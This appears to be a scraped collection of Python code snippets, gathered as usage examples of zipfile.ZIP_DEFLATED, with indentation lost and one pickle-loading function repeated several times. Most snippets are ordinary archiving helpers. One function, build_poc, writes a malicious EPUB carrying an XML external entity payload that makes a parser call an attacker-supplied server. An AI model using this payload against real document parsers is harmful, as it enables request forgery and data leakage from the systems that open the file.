def zipdir(archivename, basedir):
'''Zip directory, from J.F. Sebastian http://stackoverflow.com/'''
assert os.path.isdir(basedir)
with closing(ZipFile(archivename, "w", ZIP_DEFLATED)) as z:
for root, dirs, files in os.walk(basedir):
#NOTE: ignore empty directories
for fn in files:
if fn[-4:]!='.zip':
absfn = os.path.join(root, fn)
zfn = absfn[len(basedir)+len(os.sep):] #XXX: relative path
z.write(absfn, zfn)
# ================ Inventory input data and create data structure =================
python类ZIP_DEFLATED的实例源码
def pickle_load(path, compression=False):
"""Unpickle a possible compressed pickle.
Parameters
----------
path: str
path to the output file
compression: bool
if true assumes that pickle was compressed when created and attempts decompression.
Returns
-------
obj: object
the unpickled object
"""
if compression:
with zipfile.ZipFile(path, "r", compression=zipfile.ZIP_DEFLATED) as myzip:
with myzip.open("data") as f:
return pickle.load(f)
else:
with open(path, "rb") as f:
return pickle.load(f)
def prepare_zip():
from pkg_resources import resource_filename as resource
from config import config
from json import dumps
logger.info('creating/updating gimel.zip')
with ZipFile('gimel.zip', 'w', ZIP_DEFLATED) as zipf:
info = ZipInfo('config.json')
info.external_attr = 0o664 << 16
zipf.writestr(info, dumps(config))
zipf.write(resource('gimel', 'config.py'), 'config.py')
zipf.write(resource('gimel', 'gimel.py'), 'gimel.py')
zipf.write(resource('gimel', 'logger.py'), 'logger.py')
for root, dirs, files in os.walk(resource('gimel', 'vendor')):
for file in files:
real_file = os.path.join(root, file)
relative_file = os.path.relpath(real_file,
resource('gimel', ''))
zipf.write(real_file, relative_file)
def reseed(self, netdb):
"""Compress netdb entries and set content"""
zip_file = io.BytesIO()
dat_files = []
for root, dirs, files in os.walk(netdb):
for f in files:
if f.endswith(".dat"):
# TODO check modified time
# may be not older than 10h
dat_files.append(os.path.join(root, f))
if len(dat_files) == 0:
raise PyseederException("Can't get enough netDb entries")
elif len(dat_files) > 75:
dat_files = random.sample(dat_files, 75)
with ZipFile(zip_file, "w", compression=ZIP_DEFLATED) as zf:
for f in dat_files:
zf.write(f, arcname=os.path.split(f)[1])
self.FILE_TYPE = 0x00
self.CONTENT_TYPE = 0x03
self.CONTENT = zip_file.getvalue()
self.CONTENT_LENGTH = len(self.CONTENT)
def __zip_function__(self):
"""
Zip source code
:return:
"""
PrintMsg.cmd('{}'.format(
os.path.join(self.path, self.zip_name)), 'ARCHIVING')
zipf = zipfile.ZipFile(
os.path.join(self.path, self.zip_name), 'w', zipfile.ZIP_DEFLATED)
if self.virtual_env:
env_path = self.virtual_env
for root, dirs, files in os.walk(self.virtual_env):
for d in dirs:
if d == 'site-packages':
env_path = os.path.join(root, d)
Lambda.zip_add_dir(env_path, zipf)
if len(self.libraries) > 0:
for lib in self.libraries:
Lambda.zip_add_dir(lib, zipf, True)
zipf.write(os.path.join(self.path, self.function), self.function)
zipf.close()
def load_full_log(self, filename, user=None, uid=None):
if isinstance(user, User):
user = user
elif uid:
user = User.objects.get(id=uid)
else:
user = self.user
if user:
if self._lists:
self.file = self._lists.get(filename=filename)
else:
self.file = TermLog.objects.get(filename=filename)
if self.file.logPath == 'locale':
return self.file.log
else:
try:
zf = zipfile.ZipFile(self.file.logPath, 'r', zipfile.ZIP_DEFLATED)
zf.setpassword(self.file.logPWD)
self._data = zf.read(zf.namelist()[0])
return self._data
except KeyError:
return 'ERROR: Did not find %s file' % filename
return 'ERROR User(None)'
def ZipFiles(targetdir, ziparchivename):
'''Create a zip archive of all files in the target directory.
'''
#os.chdir(targetdir)
myzip = zipfile.ZipFile(ziparchivename, "w", zipfile.ZIP_DEFLATED)
if type(targetdir) == str:
for root, dirs, files in os.walk(targetdir):
for fname in files:
if fname != ziparchivename:
myzip.write(os.path.join(root,fname))
if type(targetdir) == list:
for fname in targetdir:
myzip.write(fname)
myzip.close()
myzip = zipfile.ZipFile(ziparchivename, "r", zipfile.ZIP_DEFLATED)
if myzip.testzip() != None:
print "Warning: Zipfile did not pass check."
myzip.close()
def createZipWithProgress(zippath, files):
"""Same as function createZip() but has a stdout progress bar which is useful for commandline work
:param zippath: the file path for the zip file
:type zippath: str
:param files: A Sequence of file paths that will be archived.
:type files: seq(str)
"""
dir = os.path.dirname(zippath)
if not os.path.exists(os.path.join(dir, os.path.dirname(zippath))):
os.makedirs(os.path.join(dir, os.path.dirname(zippath)))
logger.debug("writing file: {}".format(zippath))
length = len(files)
progressBar = commandline.CommandProgressBar(length, prefix='Progress:', suffix='Complete', barLength=50)
progressBar.start()
with zipfile.ZipFile(zippath, "w", zipfile.ZIP_DEFLATED) as archive:
for p in iter(files):
logger.debug("Archiving file: {} ----> :{}\n".format(p[0], p[1]))
archive.write(p[0], p[1])
progressBar.increment(1)
logger.debug("finished writing zip file to : {}".format(zippath))
def format(self, parts, events, filename, *args):
prefix, ext = os.path.splitext(filename)
if ext.lower() == ".zip":
zip_name = filename
raw_name = prefix
else:
zip_name = filename + ".zip"
raw_name = filename
data = self.formatter.format(parts, events, *args)
memfile = StringIO()
zipped = zipfile.ZipFile(memfile, 'w', zipfile.ZIP_DEFLATED)
zipped.writestr(raw_name, data.encode("utf-8"))
zipped.close()
memfile.flush()
memfile.seek(0)
part = MIMEBase("application", "zip")
part.set_payload(memfile.read())
encode_base64(part)
part.add_header("Content-Disposition", "attachment", filename=zip_name)
parts.append(part)
return u""
def makeZipFiles(self):
self._makebigfile('bigfile.zip', zipfile.ZIP_STORED)
zf2=zipfile.ZipFile('littlefiles.zip', 'w')
try:
os.mkdir('zipstreamdir')
except EnvironmentError:
pass
for i in range(1000):
fn='zipstreamdir/%d' % i
stuff(fn, '')
zf2.write(fn)
zf2.close()
self._makebigfile('bigfile_deflated.zip', zipfile.ZIP_DEFLATED)
self.cleanupUnzippedJunk()
def create_zip_file(self, file_name, args):
# Set generic lambda function name
function_name = file_name + '.py'
# Copy file to avoid messing with the repo files
# We have to rename because the function name afects the handler name
shutil.copy(Config.dir_path + '/lambda/scarsupervisor.py', function_name)
# Zip the function file
with zipfile.ZipFile(Config.zip_file_path, 'w', zipfile.ZIP_DEFLATED) as zf:
# Lambda function code
zf.write(function_name)
# Udocker script code
zf.write(Config.dir_path + '/lambda/udocker', 'udocker')
# Udocker libs
zf.write(Config.dir_path + '/lambda/udocker-1.1.0-RC2.tar.gz', 'udocker-1.1.0-RC2.tar.gz')
os.remove(function_name)
if hasattr(args, 'script') and args.script:
zf.write(args.script, 'init_script.sh')
Config.lambda_env_variables['Variables']['INIT_SCRIPT_PATH'] = "/var/task/init_script.sh"
if hasattr(args, 'extra_payload') and args.extra_payload:
self.zipfolder(Config.zip_file_path, args.extra_payload)
Config.lambda_env_variables['Variables']['EXTRA_PAYLOAD'] = "/var/task/extra/"
# Return the zip as an array of bytes
with open(Config.zip_file_path, 'rb') as f:
return f.read()
def backup_theme(self, themename):
'''backup a colortheme to a zipfile'''
import zipfile
backup_path = xbmcgui.Dialog().browse(3, self.addon.getLocalizedString(32029), "files").decode("utf-8")
if backup_path:
xbmc.executebuiltin("ActivateWindow(busydialog)")
backup_name = u"%s ColorTheme - %s" % (get_skin_name().capitalize(), themename)
backupfile = os.path.join(backup_path, backup_name + u".zip")
zip_temp = u'special://temp/%s.zip' % backup_name
xbmcvfs.delete(zip_temp)
xbmcvfs.delete(backupfile)
zip_temp = xbmc.translatePath(zip_temp).decode("utf-8")
zip_file = zipfile.ZipFile(zip_temp, "w", zipfile.ZIP_DEFLATED)
abs_src = os.path.abspath(xbmc.translatePath(self.userthemes_path).decode("utf-8"))
for filename in xbmcvfs.listdir(self.userthemes_path)[1]:
if (filename.startswith("%s_" % themename) or
filename.replace(".theme", "").replace(".jpg", "") == themename):
filename = filename.decode("utf-8")
filepath = xbmc.translatePath(self.userthemes_path + filename).decode("utf-8")
absname = os.path.abspath(filepath)
arcname = absname[len(abs_src) + 1:]
zip_file.write(absname, arcname)
zip_file.close()
xbmcvfs.copy(zip_temp, backupfile)
xbmc.executebuiltin("Dialog.Close(busydialog)")
def pickle_load(path, compression=False):
"""Unpickle a possible compressed pickle.
Parameters
----------
path: str
path to the output file
compression: bool
if true assumes that pickle was compressed when created and attempts decompression.
Returns
-------
obj: object
the unpickled object
"""
if compression:
with zipfile.ZipFile(path, "r", compression=zipfile.ZIP_DEFLATED) as myzip:
with myzip.open("data") as f:
return pickle.load(f)
else:
with open(path, "rb") as f:
return pickle.load(f)
def run():
urls = [
x.strip()
for x in URLS.strip().splitlines()
if x.strip() and not x.strip().startswith('#')
]
with tempfile.TemporaryDirectory(prefix='symbols') as tmpdirname:
downloaded = download_all(urls, tmpdirname)
save_filepath = 'symbols-for-systemtests.zip'
total_time_took = 0.0
total_size = 0
with zipfile.ZipFile(save_filepath, mode='w') as zf:
for uri, (fullpath, time_took, size) in downloaded.items():
total_time_took += time_took
total_size += size
if fullpath:
path = uri.replace('v1/', '')
assert os.path.isfile(fullpath)
zf.write(
fullpath,
arcname=path,
compress_type=zipfile.ZIP_DEFLATED,
)
def _upload(self, filename):
fp = IOStream()
zipped = zipfile.ZipFile(fp, 'w', zipfile.ZIP_DEFLATED)
zipped.write(filename, os.path.split(filename)[1])
zipped.close()
content = base64.encodestring(fp.getvalue())
if not isinstance(content, str):
content = content.decode('utf-8')
try:
return self._execute(Command.UPLOAD_FILE,
{'file': content})['value']
except WebDriverException as e:
if "Unrecognized command: POST" in e.__str__():
return filename
elif "Command not found: POST " in e.__str__():
return filename
elif '{"status":405,"value":["GET","HEAD","DELETE"]}' in e.__str__():
return filename
else:
raise e
def plaintext2zip(self, file_name, subdirname, plaintext):
file_name=file_name.split('.')[0]
plaintext_file_name = STATIC_PLAINTEXT_ARTICLES_DIR+subdirname+'/'+file_name+'.txt'
zip_file_name = STATIC_PLAINTEXT_ARTICLES_DIR+subdirname+'/'+file_name+'.zip'
if not os.path.exists(STATIC_PLAINTEXT_ARTICLES_DIR+subdirname):
os.makedirs(STATIC_PLAINTEXT_ARTICLES_DIR+subdirname)
with codecs.open(plaintext_file_name, 'w', encoding='utf8') as outfile:
outfile.write(plaintext)
outfile.flush()
outfile.close()
zf = zipfile.ZipFile(zip_file_name, mode='w', compression=zipfile.ZIP_DEFLATED)
try:
zf.write(plaintext_file_name, os.path.basename(plaintext_file_name))
os.remove(plaintext_file_name)
except Exception, e:
print e
logging.error('zip error %s ' % plaintext_file_name)
finally:
zf.close()
def make_archive(folderpath, archive):
"""
Create zip with path *archive from folder with path *folderpath
"""
file_list = get_absolute_file_paths(folderpath)
with zipfile.ZipFile(archive, 'w', zipfile.ZIP_DEFLATED) as zip_file:
for addon_file in file_list:
path_list = re.split(r'[\\/]', addon_file)
rel_path = os.path.relpath(addon_file, folderpath)
if ".git" in path_list:
continue
if rel_path.startswith("media") and not rel_path.endswith(".xbt"):
continue
if rel_path.startswith("themes"):
continue
if addon_file.endswith(('.pyc', '.pyo', '.zip')):
continue
if addon_file.startswith(('.')):
continue
zip_file.write(addon_file, rel_path)
logging.warning("zipped %s" % rel_path)
def updateZip(zipname, filename, data):
# generate a temp file
tmpfd, tmpname = tempfile.mkstemp(dir=os.path.dirname(zipname))
os.close(tmpfd)
# create a temp copy of the archive without filename
with zipfile.ZipFile(zipname, 'r') as zin:
with zipfile.ZipFile(tmpname, 'w') as zout:
zout.comment = zin.comment # preserve the comment
for item in zin.infolist():
if item.filename != filename:
zout.writestr(item, zin.read(item.filename))
# replace with the temp archive
os.remove(zipname)
os.rename(tmpname, zipname)
# now add filename with its new data
with zipfile.ZipFile(zipname, mode='a', compression=zipfile.ZIP_DEFLATED) as zf:
zf.writestr(filename, data)
def pickle_load(path, compression=False):
"""Unpickle a possible compressed pickle.
Parameters
----------
path: str
path to the output file
compression: bool
if true assumes that pickle was compressed when created and attempts decompression.
Returns
-------
obj: object
the unpickled object
"""
if compression:
with zipfile.ZipFile(path, "r", compression=zipfile.ZIP_DEFLATED) as myzip:
with myzip.open("data") as f:
return pickle.load(f)
else:
with open(path, "rb") as f:
return pickle.load(f)
def _ArchiveOutputDir(self):
"""Archive all files in the output dir, and return as compressed bytes."""
with io.BytesIO() as archive:
with zipfile.ZipFile(archive, 'w', zipfile.ZIP_DEFLATED) as contents:
num_files = 0
for absdir, _, files in os.walk(self._output_dir):
reldir = os.path.relpath(absdir, self._output_dir)
for filename in files:
src_path = os.path.join(absdir, filename)
# We use normpath to turn './file.txt' into just 'file.txt'.
dst_path = os.path.normpath(os.path.join(reldir, filename))
contents.write(src_path, dst_path)
num_files += 1
if num_files:
logging.info('%d files in the output dir were archived.', num_files)
else:
logging.warning('No files in the output dir. Archive is empty.')
return archive.getvalue()
def _write_zip(self):
try:
file = zipfile.ZipFile(self.filename,"w",zipfile.ZIP_DEFLATED)
except IOError as msg:
errmsg = "%s\n%s" % (_("Could not create %s") % self.filename, msg)
raise ReportError(errmsg)
except:
raise ReportError(_("Could not create %s") % self.filename)
file.write(self.manifest_xml,str("META-INF/manifest.xml"))
file.write(self.content_xml,str("content.xml"))
file.write(self.meta_xml,str("meta.xml"))
file.write(self.styles_xml,str("styles.xml"))
file.write(self.mimetype,str("mimetype"))
file.close()
os.unlink(self.manifest_xml)
os.unlink(self.content_xml)
os.unlink(self.meta_xml)
os.unlink(self.styles_xml)
def pickle_load(path, compression=False):
"""Unpickle a possible compressed pickle.
Parameters
----------
path: str
path to the output file
compression: bool
if true assumes that pickle was compressed when created and attempts decompression.
Returns
-------
obj: object
the unpickled object
"""
if compression:
with zipfile.ZipFile(path, "r", compression=zipfile.ZIP_DEFLATED) as myzip:
with myzip.open("data") as f:
return pickle.load(f)
else:
with open(path, "rb") as f:
return pickle.load(f)
def dir2zip(in_dir, zip_fname):
""" Make a zip file `zip_fname` with contents of directory `in_dir`
The recorded filenames are relative to `in_dir`, so doing a standard zip
unpack of the resulting `zip_fname` in an empty directory will result in
the original directory contents.
Parameters
----------
in_dir : str
Directory path containing files to go in the zip archive
zip_fname : str
Filename of zip archive to write
"""
z = zipfile.ZipFile(zip_fname, 'w', compression=zipfile.ZIP_DEFLATED)
for root, dirs, files in os.walk(in_dir):
for file in files:
fname = os.path.join(root, file)
out_fname = os.path.relpath(fname, in_dir)
z.write(os.path.join(root, file), out_fname)
z.close()
def assemble_my_parts(self):
"""Assemble the `self.parts` dictionary. Extend in subclasses.
"""
writers.Writer.assemble_parts(self)
f = tempfile.NamedTemporaryFile()
zfile = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
self.write_zip_str(zfile, 'mimetype', self.MIME_TYPE,
compress_type=zipfile.ZIP_STORED)
content = self.visitor.content_astext()
self.write_zip_str(zfile, 'content.xml', content)
s1 = self.create_manifest()
self.write_zip_str(zfile, 'META-INF/manifest.xml', s1)
s1 = self.create_meta()
self.write_zip_str(zfile, 'meta.xml', s1)
s1 = self.get_stylesheet()
self.write_zip_str(zfile, 'styles.xml', s1)
self.store_embedded_files(zfile)
self.copy_from_stylesheet(zfile)
zfile.close()
f.seek(0)
whole = f.read()
f.close()
self.parts['whole'] = whole
self.parts['encoding'] = self.document.settings.output_encoding
self.parts['version'] = docutils.__version__
def build_poc(server):
xxe = """<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://%s:9090/">]>
<container version="1.0" xmlns="urn:oasis:names:tc:opendocument:xmlns:container">
<rootfiles>
<rootfile full-path="content.opf" media-type="application/oebps-package+xml">&xxe;</rootfile>
</rootfiles>
</container>""" % server
f = StringIO()
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
zipinfo = zipfile.ZipInfo("META-INF/container.xml")
zipinfo.external_attr = 0777 << 16L
z.writestr(zipinfo, xxe)
z.close()
epub = open('poc.epub','wb')
epub.write(f.getvalue())
epub.close()
def build_zip(self, pathname, archive_paths):
with ZipFile(pathname, 'w', zipfile.ZIP_DEFLATED) as zf:
for ap, p in archive_paths:
logger.debug('Wrote %s to %s in wheel', p, ap)
zf.write(p, ap)
def make_zipfile(zip_filename, base_dir, verbose=0, dry_run=0, compress=True,
mode='w'):
"""Create a zip file from all the files under 'base_dir'. The output
zip file will be named 'base_dir' + ".zip". Uses either the "zipfile"
Python module (if available) or the InfoZIP "zip" utility (if installed
and found on the default search path). If neither tool is available,
raises DistutilsExecError. Returns the name of the output zip file.
"""
import zipfile
mkpath(os.path.dirname(zip_filename), dry_run=dry_run)
log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir)
def visit(z, dirname, names):
for name in names:
path = os.path.normpath(os.path.join(dirname, name))
if os.path.isfile(path):
p = path[len(base_dir) + 1:]
if not dry_run:
z.write(path, p)
log.debug("adding '%s'", p)
compression = zipfile.ZIP_DEFLATED if compress else zipfile.ZIP_STORED
if not dry_run:
z = zipfile.ZipFile(zip_filename, mode, compression=compression)
for dirname, dirs, files in os.walk(base_dir):
visit(z, dirname, files)
z.close()
else:
for dirname, dirs, files in os.walk(base_dir):
visit(None, dirname, files)
return zip_filename
def create_zip(cls, fname):
example_file = fname + ".txt"
zip_file = fname + ".zip"
touch(example_file)
zfh = zipfile.ZipFile(fname + ".zip", 'w', zipfile.ZIP_DEFLATED)
zfh.write(example_file)
zfh.close()
os.remove(example_file)
return zip_file
def archive(cls, path):
"""Creates a zip file containing the given directory.
:param path: Path to the archived directory.
:return:
"""
import zipfile
dir_name = os.path.basename(path)
zip_path = os.path.join(tempfile.gettempdir(), '%s.zip' % dir_name)
parent_path = os.path.dirname(path) + '/'
z = zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED,
allowZip64=True)
try:
for current_dir_path, dir_names, file_names in os.walk(path):
for dir_name in dir_names:
dir_path = os.path.join(current_dir_path, dir_name)
arch_path = dir_path[len(parent_path):]
z.write(dir_path, arch_path)
for file_name in file_names:
file_path = os.path.join(current_dir_path, file_name)
arch_path = file_path[len(parent_path):]
z.write(file_path, arch_path)
finally:
z.close()
return zip_path
def build_zip(self, pathname, archive_paths):
with ZipFile(pathname, 'w', zipfile.ZIP_DEFLATED) as zf:
for ap, p in archive_paths:
logger.debug('Wrote %s to %s in wheel', p, ap)
zf.write(p, ap)